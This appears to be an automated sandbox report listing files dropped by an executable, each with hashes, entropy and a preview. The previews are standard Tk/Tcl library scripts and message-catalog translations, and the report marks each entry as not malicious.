                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30840
                                                                                                                                                                                                                              Entropy (8bit):5.142909056222569
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:+c4g8rSnBGzHsGK83Ch0x/0kmSq6O4+rNfPCpM2sEmqKys3pCJxi5dEaY:+c4g8OnBGzBK83Ch0x/0FSq6OnrGM2h3
                                                                                                                                                                                                                              MD5:983C7B78F1A0EBACAB8006D391A01FCD
                                                                                                                                                                                                                              SHA1:7EA37474EA039ED7A37BFDD7D76EAE673E666283
                                                                                                                                                                                                                              SHA-256:C5BDCA3ABA671F03DC4624AB5FD260490F5002491D6C619142CCF5A1A744528A
                                                                                                                                                                                                                              SHA-512:A006EF9B7213E572F6FC540D1512A52C52FEC44E3A07846DE09662AE32B7191C5CF639798531847B39E4076BF9DD6314B6F5373065C04F4FEF221185B39C3117
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# mkpsenc.tcl --..#..# This file generates the postscript prolog used by Tk.....namespace eval ::tk {.. # Creates Postscript encoding vector for ISO-8859-1 (could theoretically.. # handle any 8-bit encoding, but Tk never generates characters outside.. # ASCII)... #.. proc CreatePostscriptEncoding {} {...variable psglyphs...# Now check for known. Even if it is known, it can be other than we...# need. GhostScript seems to be happy with such approach...set result "\[\n"...for {set i 0} {$i<256} {incr i 8} {... for {set j 0} {$j<8} {incr j} {....set enc [encoding convertfrom "iso8859-1" \.....[format %c [expr {$i+$j}]]]....catch {.... set hexcode {}.... set hexcode [format %04X [scan $enc %c]]....}....if {[info exists psglyphs($hexcode)]} {.... append result "/$psglyphs($hexcode)"....} else {.... append result "/space"....}... }... append result "\n"...}...append result "\]"...return $result.. }.... # List of adobe glyph names. Converted from glyph
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16786
                                                                                                                                                                                                                              Entropy (8bit):4.717927930017041
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:+haZOxBpK8uxGe4V88/wxY3Fxqipz4zz4zxxFzxT4OcErDxqdRRZeuC/Vj2CoopC:+hRWRG3FFjvsfCoopwITHzLHFHHAABs
                                                                                                                                                                                                                              MD5:217087AB6B2A8F9D7252E311D69C3769
                                                                                                                                                                                                                              SHA1:09AEB2BC5B7C7F4AB3DE4211D786C519AE0970F6
                                                                                                                                                                                                                              SHA-256:A07E3A3809CED3C6C9C1E171DCA5AD1F28357734CD41B2B9DD9F58085B3D2842
                                                                                                                                                                                                                              SHA-512:6E57633C924BFC16D380C014C20DD24D5727E70D4843FCEC4D7995B4DB21941EA8F2A5FD6E5386DF3364B6905D4D66B2B9595DC8FC70CFF40A2D49A92A1B6FBA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# msgbox.tcl --..#..#.Implements messageboxes for platforms that do not have native..#.messagebox support...#..# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# Ensure existence of ::tk::dialog namespace..#..namespace eval ::tk::dialog {}....image create bitmap ::tk::dialog::b1 -foreground black \..-data "#define b1_width 32\n#define b1_height 32..static unsigned char q1_bits[] = {.. 0x00, 0xf8, 0x1f, 0x00, 0x00, 0x07, 0xe0, 0x00, 0xc0, 0x00, 0x00, 0x03,.. 0x20, 0x00, 0x00, 0x04, 0x10, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x10,.. 0x04, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,.. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,.. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,.. 0x01, 0x00, 0x00, 0x80, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,.. 0x04, 0x00,
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4235
                                                                                                                                                                                                                              Entropy (8bit):4.789130604359491
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nlw9Twd+j3gLhokqwX+hTnJgNanPNcgRhgP+5QPwJJENL:nlw9TjjwI3hTnJgNaRhgP75L
                                                                                                                                                                                                                              MD5:5A8B46B85DCCBF74E2B5B820E1A7B9D1
                                                                                                                                                                                                                              SHA1:980F4FC5BABA82BA0FE02F9BD03A23DF6D565BB1
                                                                                                                                                                                                                              SHA-256:4DFFBEEDBF0D66D84B13088016D1A782CEAAD4DED27BE1E38842F8969C0E533F
                                                                                                                                                                                                                              SHA-512:2D81FC06CF3C20E4F6314BD13AF81FDE38A9B06510584C84C6A0C8C36314F980F77D02BD8056E7EE5DE599A0620E0C0349124147334B9C141145270046B19D90
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset cs "&Abort" "&P\u0159eru\u0161it".. ::msgcat::mcset cs "&About..." "&O programu...".. ::msgcat::mcset cs "All Files" "V\u0161echny soubory".. ::msgcat::mcset cs "Application Error" "Chyba programu".. ::msgcat::mcset cs "Bold Italic".. ::msgcat::mcset cs "&Blue" "&Modr\341".. ::msgcat::mcset cs "Cancel" "Zru\u0161it".. ::msgcat::mcset cs "&Cancel" "&Zru\u0161it".. ::msgcat::mcset cs "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nemohu zm\u011bnit atku\341ln\355 adres\341\u0159 na \"%1\$s\".\nP\u0159\355stup odm\355tnut.".. ::msgcat::mcset cs "Choose Directory" "V\375b\u011br adres\341\u0159e".. ::msgcat::mcset cs "Cl&ear" "Sma&zat".. ::msgcat::mcset cs "&Clear Console" "&Smazat konzolu".. ::msgcat::mcset cs "Color" "Barva".. ::msgcat::mcset cs "Console" "Konzole".. ::msgcat::mcset cs "&Copy" "&Kop\355rovat".. ::msgcat::mcset cs "Cu&t" "V&y\u0159\355znout".. ::msgcat::mcset cs "&
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3987
                                                                                                                                                                                                                              Entropy (8bit):4.651948695787255
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nRZ2uDMr05sIEzs2KkrT+XuTKN0FjDDP9:nRZzDy4kBKkrT+QpP9
                                                                                                                                                                                                                              MD5:227B0F255F854460E8E5146ED7A17B85
                                                                                                                                                                                                                              SHA1:99A080CAD631F21963C51A5B254BDAD3724DC866
                                                                                                                                                                                                                              SHA-256:FEEF8F8AD33BB3362C845A25D6ED273C398051047D899B31790474614C7AFD2D
                                                                                                                                                                                                                              SHA-512:36A4B48831316CC29686CC76DA00110EB078EC56F55A960D11AE427AA3D913C340C1E3805BF2AD40C1A8A92FC6587DA5D2C245E7501289FC3E228BE14FE49598
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset da "&Abort" "&Afbryd".. ::msgcat::mcset da "&About..." "&Om...".. ::msgcat::mcset da "All Files" "Alle filer".. ::msgcat::mcset da "Application Error" "Programfejl".. ::msgcat::mcset da "&Blue" "&Bl\u00E5".. ::msgcat::mcset da "Cancel" "Annuller".. ::msgcat::mcset da "&Cancel" "&Annuller".. ::msgcat::mcset da "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ikke skifte til katalog \"%1\$s\".\nIngen rettigheder.".. ::msgcat::mcset da "Choose Directory" "V\u00E6lg katalog".. ::msgcat::mcset da "Cl&ear" "&Ryd".. ::msgcat::mcset da "&Clear Console" "&Ryd konsolen".. ::msgcat::mcset da "Color" "Farve".. ::msgcat::mcset da "Console" "Konsol".. ::msgcat::mcset da "&Copy" "&Kopier".. ::msgcat::mcset da "Cu&t" "Kli&p".. ::msgcat::mcset da "&Delete" "&Slet".. ::msgcat::mcset da "Details >>" "Detailer".. ::msgcat::mcset da "Directory \"%1\$s\" does not exist." "Katalog \"%1\$s\" finde
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4914
                                                                                                                                                                                                                              Entropy (8bit):4.6221938909259475
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:nxLEpatioUqGBLbz4ME/XKKVN9R7S/0oYr9:epY3MkXKKxRu2r9
                                                                                                                                                                                                                              MD5:2203F65BCDA61BC15AEAC4F868C6D94A
                                                                                                                                                                                                                              SHA1:C4CC3975679D23892406E4E8971359A0775B1B86
                                                                                                                                                                                                                              SHA-256:C0F574B14068A049E93421C73873D750C98DE28B7B77AA42FE72CBE0270A4186
                                                                                                                                                                                                                              SHA-512:79F134FDAD3B12524D43BF9F59D3C04CAE30A95F591A51B82C8DF7CC8563BEA5D464AEECC457D9F60C04365E30459C447ED537AFC832BA25E1815DE06C2B81E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset de "&Abort" "&Abbruch".. ::msgcat::mcset de "&About..." "&\u00dcber...".. ::msgcat::mcset de "All Files" "Alle Dateien".. ::msgcat::mcset de "Application Error" "Applikationsfehler".. ::msgcat::mcset de "&Apply" "&Anwenden".. ::msgcat::mcset de "Bold" "Fett".. ::msgcat::mcset de "Bold Italic" "Fett kursiv".. ::msgcat::mcset de "&Blue" "&Blau".. ::msgcat::mcset de "Cancel" "Abbruch".. ::msgcat::mcset de "&Cancel" "&Abbruch".. ::msgcat::mcset de "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kann nicht in das Verzeichnis \"%1\$s\" wechseln.\nKeine Rechte vorhanden.".. ::msgcat::mcset de "Choose Directory" "W\u00e4hle Verzeichnis".. ::msgcat::mcset de "Cl&ear" "&R\u00fccksetzen".. ::msgcat::mcset de "&Clear Console" "&Konsole l\u00f6schen".. ::msgcat::mcset de "Color" "Farbe".. ::msgcat::mcset de "Console" "Konsole".. ::msgcat::mcset de "&Copy" "&Kopieren".. ::msgcat::mcset de "
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (355), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8784
                                                                                                                                                                                                                              Entropy (8bit):4.334043617395095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:tVj/F+oxBHbkI8+xTqFt2zPJ0k63fRGIUvPXrfBNnzc+zIF7meUOT7GC8MO07S0g:fj9+AHlLoozHn7fBFrMVmehCAGb
                                                                                                                                                                                                                              MD5:780F863903BBDAA6C371EC0D3C7E6D59
                                                                                                                                                                                                                              SHA1:DF5D435E132BEE4C076A7FC577C8C275A8B68CD5
                                                                                                                                                                                                                              SHA-256:3F6F155864FE59A341BFD869735E54DD21CEE21BBD038433D9B271AD77BA3F7E
                                                                                                                                                                                                                              SHA-512:091965EE912513AE1943BE840A2E757188FBA6F760F7C47BE80D06313D59B051F183E3A29D4B1CEDE1F9E54CA3CA23D75FF2C3A3672A4E71FB56F0FA76F7FA0D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:## Messages for the Greek (Hellenic - "el") language...## Please report any changes/suggestions to:..## petasis@iit.demokritos.gr....namespace eval ::tk {.. ::msgcat::mcset el "&Abort" "\u03a4\u03b5\u03c1\u03bc\u03b1\u03c4\u03b9\u03c3\u03bc\u03cc\u03c2".. ::msgcat::mcset el "About..." "\u03a3\u03c7\u03b5\u03c4\u03b9\u03ba\u03ac...".. ::msgcat::mcset el "All Files" "\u038c\u03bb\u03b1 \u03c4\u03b1 \u0391\u03c1\u03c7\u03b5\u03af\u03b1".. ::msgcat::mcset el "Application Error" "\u039b\u03ac\u03b8\u03bf\u03c2 \u0395\u03c6\u03b1\u03c1\u03bc\u03bf\u03b3\u03ae\u03c2".. ::msgcat::mcset el "&Blue" "\u039c\u03c0\u03bb\u03b5".. ::msgcat::mcset el "&Cancel" "\u0391\u03ba\u03cd\u03c1\u03c9\u03c3\u03b7".. ::msgcat::mcset el \.."Cannot change to the directory \"%1\$s\".\nPermission denied." \.."\u0394\u03b5\u03bd \u03b5\u03af\u03bd\u03b1\u03b9 \u03b4\u03c5\u03bd\u03b1\u03c4\u03ae \u03b7 \u03b1\u03bb\u03bb\u03b1\u03b3\u
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3377
                                                                                                                                                                                                                              Entropy (8bit):4.279601088621442
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:sQ7dw5bO0V3gqmCNyoKJ6iwp/uvENv4SKEcET2hsHFjr:n7dwNOc3RmOKJQcvEl4SK1ET2hYFjr
                                                                                                                                                                                                                              MD5:D48CFC9EC779085E8F6AAA7B1C40C89A
                                                                                                                                                                                                                              SHA1:0CF6253BFF39F40CA0991F9B06D3394BFEA21ED2
                                                                                                                                                                                                                              SHA-256:4A33B44B2E220E28EAAE7FAC407CAFE43D97C270DA58FA5F3B699A1760BFB2A4
                                                                                                                                                                                                                              SHA-512:C00EC0CFB48ABE621EF625C51952BCF177CE3BC7F0DEC5276EF84C9A97C7E014806B106EA8DEE202C43F8DD54ED7261A8D899E3EE12E3F37A90C387D864463AE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset en "&Abort".. ::msgcat::mcset en "&About...".. ::msgcat::mcset en "All Files".. ::msgcat::mcset en "Application Error".. ::msgcat::mcset en "&Apply".. ::msgcat::mcset en "Bold".. ::msgcat::mcset en "Bold Italic".. ::msgcat::mcset en "&Blue".. ::msgcat::mcset en "Cancel".. ::msgcat::mcset en "&Cancel".. ::msgcat::mcset en "Cannot change to the directory \"%1\$s\".\nPermission denied.".. ::msgcat::mcset en "Choose Directory".. ::msgcat::mcset en "Cl&ear".. ::msgcat::mcset en "&Clear Console".. ::msgcat::mcset en "Color".. ::msgcat::mcset en "Console".. ::msgcat::mcset en "&Copy".. ::msgcat::mcset en "Cu&t".. ::msgcat::mcset en "&Delete".. ::msgcat::mcset en "Details >>".. ::msgcat::mcset en "Directory \"%1\$s\" does not exist.".. ::msgcat::mcset en "&Directory:".. ::msgcat::mcset en "&Edit".. ::msgcat::mcset en "Effects".. ::msgcat::mcset en "Error: %1\$s".. ::msgcat::mcs
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):66
                                                                                                                                                                                                                              Entropy (8bit):4.262228832346611
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:fEGp6fRyv//mGoW8vMKEQXyVn:sooyv//xoQOOn
                                                                                                                                                                                                                              MD5:3D41FC47CD9936F817EF9645D73A77ED
                                                                                                                                                                                                                              SHA1:E62BBE094B71CAF4A389DE3ECD84D2EEFBA33827
                                                                                                                                                                                                                              SHA-256:01238293356E82F1D298896491F8B299BB7DC9C34F299C9E756254C736DA612B
                                                                                                                                                                                                                              SHA-512:B92582C32C4D7CD9DE6571CBB6B93DD693A8B5A80645468E2D02B80C339BE2B95D5B4878A0DA9AFFE9E2F98A6C38AAE9CC1FF2440146D0ED128FE8C9A92EECDB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset en_gb Color Colour..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4035
                                                                                                                                                                                                                              Entropy (8bit):4.614759526381991
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:n6oXunu4/LQmI+nl0WemQ+uISIKk/2nibN5My/uXcFSZHBohy:n6oXuu4jJtlPemVuISIKkuniJS1Gy
                                                                                                                                                                                                                              MD5:3704A08985B0AA3C521FDF9C2DA59D97
                                                                                                                                                                                                                              SHA1:3F1E42C5697504B4DEE1EE314CD361B4203BF686
                                                                                                                                                                                                                              SHA-256:84B117857674A2426290946053A61316C5C8C6808F2C6EDF0ECC5C4A9C5C72AC
                                                                                                                                                                                                                              SHA-512:99FE97B10B1CA59DDA0385161E7C05F7D22424B6B1FB844138921EF94B2E9809D73EBC0062897D0DDE040CF92C96A6E4916CC9F3F02442AE2C4162858434B6BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset eo "&Abort" "&\u0108esigu".. ::msgcat::mcset eo "&About..." "Pri...".. ::msgcat::mcset eo "All Files" "\u0108iuj dosieroj".. ::msgcat::mcset eo "Application Error" "Aplikoeraro".. ::msgcat::mcset eo "&Blue" "&Blua".. ::msgcat::mcset eo "Cancel" "Rezignu".. ::msgcat::mcset eo "&Cancel" "&Rezignu".. ::msgcat::mcset eo "Cannot change to the directory \"%1\$s\".\nPermission denied." "Neeble \u015dan\u011di al dosierujo \"%1\$s\".\nVi ne rajtas tion.".. ::msgcat::mcset eo "Choose Directory" "Elektu Dosierujon".. ::msgcat::mcset eo "Cl&ear" "&Vakigu".. ::msgcat::mcset eo "&Clear Console" "&Vakigu konzolon".. ::msgcat::mcset eo "Color" "Koloro".. ::msgcat::mcset eo "Console" "Konzolo".. ::msgcat::mcset eo "&Copy" "&Kopiu".. ::msgcat::mcset eo "Cu&t" "&Eltondu".. ::msgcat::mcset eo "&Delete" "&Forigu".. ::msgcat::mcset eo "Details >>" "Detaloj >>".. ::msgcat::mcset eo "Directory \"%1\$s\" does not exi
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4024
                                                                                                                                                                                                                              Entropy (8bit):4.536517819515934
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nN0T1Lt8ZYSih/aiik148aFscyTzoixccUTqjcg60Dx/H5:nN0BLSQUXy/o8re055
                                                                                                                                                                                                                              MD5:4765F3C055742530E4644771EBC6C69F
                                                                                                                                                                                                                              SHA1:8BEA722AC00522DEAA5B380AEEF4CA57D7A271BD
                                                                                                                                                                                                                              SHA-256:D2842B80F1B521EFF2D2656A69274B5F2A8F4F5831AF2E8EE73E3C37389F981F
                                                                                                                                                                                                                              SHA-512:9CA247F22797A1A1FCA42B5CDABF58262ED95EECDDD321CEB1440A60A4375923E0F511238F360D159EB5EED6F82CBBE0B8907A07CC77DB831BF97082932CD0FD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset es "&Abort" "&Abortar".. ::msgcat::mcset es "&About..." "&Acerca de ...".. ::msgcat::mcset es "All Files" "Todos los archivos".. ::msgcat::mcset es "Application Error" "Error de la aplicaci\u00f3n".. ::msgcat::mcset es "&Blue" "&Azul".. ::msgcat::mcset es "Cancel" "Cancelar".. ::msgcat::mcset es "&Cancel" "&Cancelar".. ::msgcat::mcset es "Cannot change to the directory \"%1\$s\".\nPermission denied." "No es posible acceder al directorio \"%1\$s\".\nPermiso denegado.".. ::msgcat::mcset es "Choose Directory" "Elegir directorio".. ::msgcat::mcset es "Cl&ear" "&Borrar".. ::msgcat::mcset es "&Clear Console" "&Borrar consola".. ::msgcat::mcset es "Color".. ::msgcat::mcset es "Console" "Consola".. ::msgcat::mcset es "&Copy" "&Copiar".. ::msgcat::mcset es "Cu&t" "Cor&tar".. ::msgcat::mcset es "&Delete" "&Borrar".. ::msgcat::mcset es "Details >>" "Detalles >>".. ::msgcat::mcset es "Directory \"%1\$s\"
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4693
                                                                                                                                                                                                                              Entropy (8bit):4.640083757706223
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:najdLGoC0TXwqTwPRNQXfdHzAIX169ZZv6CpvgIPJupuupw6kWVVxn6/9Yv:nWdLGo2WiMn4t5pvbxuPtx6F6
                                                                                                                                                                                                                              MD5:BD795A1D95446BEE7AEB16FB6E346271
                                                                                                                                                                                                                              SHA1:38469DBD386C35B90EBE0A0FE2CE9F1AB5A5444A
                                                                                                                                                                                                                              SHA-256:893BEDCDAED4602898D988E6248B8BB0857DD66C06194B45F31340CA03D82369
                                                                                                                                                                                                                              SHA-512:B9BDDECB1DE2025C6C4027BF6228A14D5F573F5859ED3444298809266F06E6203F72004D589314C6529A2E198039355B4FD6160F87DA8F97B55E9F841B6C3F5A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset fi "&Abort" "&Keskeyt\u00e4".. ::msgcat::mcset fi "&About..." "&Tietoja...".. ::msgcat::mcset fi "All Files" "Kaikki tiedostot".. ::msgcat::mcset fi "Application Error" "Ohjelmavirhe".. ::msgcat::mcset fi "&Apply" "K\u00e4&yt\u00e4".. ::msgcat::mcset fi "Bold" "Lihavoitu".. ::msgcat::mcset fi "Bold Italic" "Lihavoitu, kursivoitu".. ::msgcat::mcset fi "&Blue" "&Sininen".. ::msgcat::mcset fi "Cancel" "Peruuta".. ::msgcat::mcset fi "&Cancel" "&Peruuta".. ::msgcat::mcset fi "Cannot change to the directory \"%1\$s\".\nPermission denied." "Ei voitu vaihtaa hakemistoon \"%1\$s\".\nLupa ev\u00e4tty.".. ::msgcat::mcset fi "Choose Directory" "Valitse hakemisto".. ::msgcat::mcset fi "Cl&ear" "&Tyhjenn\u00e4".. ::msgcat::mcset fi "&Clear Console" "&Tyhjenn\u00e4 konsoli".. ::msgcat::mcset fi "Color" "V\u00e4ri".. ::msgcat::mcset fi "Console" "Konsoli".. ::msgcat::mcset fi "&Copy" "K&opioi".. ::msgcat::mcs
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3877
                                                                                                                                                                                                                              Entropy (8bit):4.630737553723335
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nByEWs/3lHFB9FamsIfSAzZ2eaISAxh0BRc3jC:nByEWaRNzsSSWonMAv
                                                                                                                                                                                                                              MD5:E279E5FFF03E1B8E9063ABC8A499A6BD
                                                                                                                                                                                                                              SHA1:80910911F6B4830BA4DCBA9A9EAD12C9F802DDC9
                                                                                                                                                                                                                              SHA-256:3F2CEB4A33695AB6B56E27F61A4C60C029935BB026497D99CB2C246BCB4A63C4
                                                                                                                                                                                                                              SHA-512:8333388E421AC3F342317BEBE352809B0B190EF8B044A0BAE2FE4051974D86008BAFDCB7098E9DC39A8D9E1E08FB87F54B9D3388AF2D0185FF913DB6788C5AB5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset fr "&Abort" "&Annuler".. ::msgcat::mcset fr "About..." "\u00c0 propos...".. ::msgcat::mcset fr "All Files" "Tous les fichiers".. ::msgcat::mcset fr "Application Error" "Erreur d'application".. ::msgcat::mcset fr "&Blue" "&Bleu".. ::msgcat::mcset fr "Cancel" "Annuler".. ::msgcat::mcset fr "&Cancel" "&Annuler".. ::msgcat::mcset fr "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossible d'acc\u00e9der au r\u00e9pertoire \"%1\$s\".\nPermission refus\u00e9e.".. ::msgcat::mcset fr "Choose Directory" "Choisir r\u00e9pertoire".. ::msgcat::mcset fr "Cl&ear" "Effacer".. ::msgcat::mcset fr "Color" "Couleur".. ::msgcat::mcset fr "Console".. ::msgcat::mcset fr "Copy" "Copier".. ::msgcat::mcset fr "Cu&t" "Couper".. ::msgcat::mcset fr "Delete" "Effacer".. ::msgcat::mcset fr "Details >>" "D\u00e9tails >>".. ::msgcat::mcset fr "Directory \"%1\$s\" does not exist." "Le r\u00e9pertoire \"%1\$s\"
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4678
                                                                                                                                                                                                                              Entropy (8bit):4.7955991577265245
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:nkCEz2TTrKmA17fzq/Hj+pUva+fQR/a5a/Thn5kU:kTqM17u/8NiMrhb
                                                                                                                                                                                                                              MD5:4F1610E0C73DAE668E3F9D9235631152
                                                                                                                                                                                                                              SHA1:63EE54A6C1A69B798C65C999D5F80A7AB252B6D8
                                                                                                                                                                                                                              SHA-256:E063AD7CA93F37728A65E4CD7C0433950F22607D307949F6CB056446AFEAA4FE
                                                                                                                                                                                                                              SHA-512:37F4B8A9CD020A77591C09AF40FBC2FA82107B2596D31B5F30CE6ECAA225417CF7A5C62FB7A93539B0D7E930D0A44F9BF2EE6BE113F831B0A72B229444672AFD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset hu "&Abort" "&Megszak\u00edt\u00e1s".. ::msgcat::mcset hu "&About..." "N\u00e9vjegy...".. ::msgcat::mcset hu "All Files" "Minden f\u00e1jl".. ::msgcat::mcset hu "Application Error" "Alkalmaz\u00e1s hiba".. ::msgcat::mcset hu "&Blue" "&K\u00e9k".. ::msgcat::mcset hu "Cancel" "M\u00e9gsem".. ::msgcat::mcset hu "&Cancel" "M\u00e9g&sem".. ::msgcat::mcset hu "Cannot change to the directory \"%1\$s\".\nPermission denied." "A k\u00f6nyvt\u00e1rv\u00e1lt\u00e1s nem siker\u00fclt: \"%1\$s\".\nHozz\u00e1f\u00e9r\u00e9s megtagadva.".. ::msgcat::mcset hu "Choose Directory" "K\u00f6nyvt\u00e1r kiv\u00e1laszt\u00e1sa".. ::msgcat::mcset hu "Cl&ear" "T\u00f6rl\u00e9s".. ::msgcat::mcset hu "&Clear Console" "&T\u00f6rl\u00e9s Konzol".. ::msgcat::mcset hu "Color" "Sz\u00edn".. ::msgcat::mcset hu "Console" "Konzol".. ::msgcat::mcset hu "&Copy" "&M\u00e1sol\u00e1s".. ::msgcat::mcset hu "Cu&t" "&Kiv\u00e1g\u00e1s".. ::ms
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3765
                                                                                                                                                                                                                              Entropy (8bit):4.49679862548805
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nmU4xnonTjwUE5Xs6ZrT8BpXAg+Wr+u92C8t7mU9nUSs:nZ4FonFE58HBpXjr+fBJs
                                                                                                                                                                                                                              MD5:B74C54666A5A431A782DB691B4CA3315
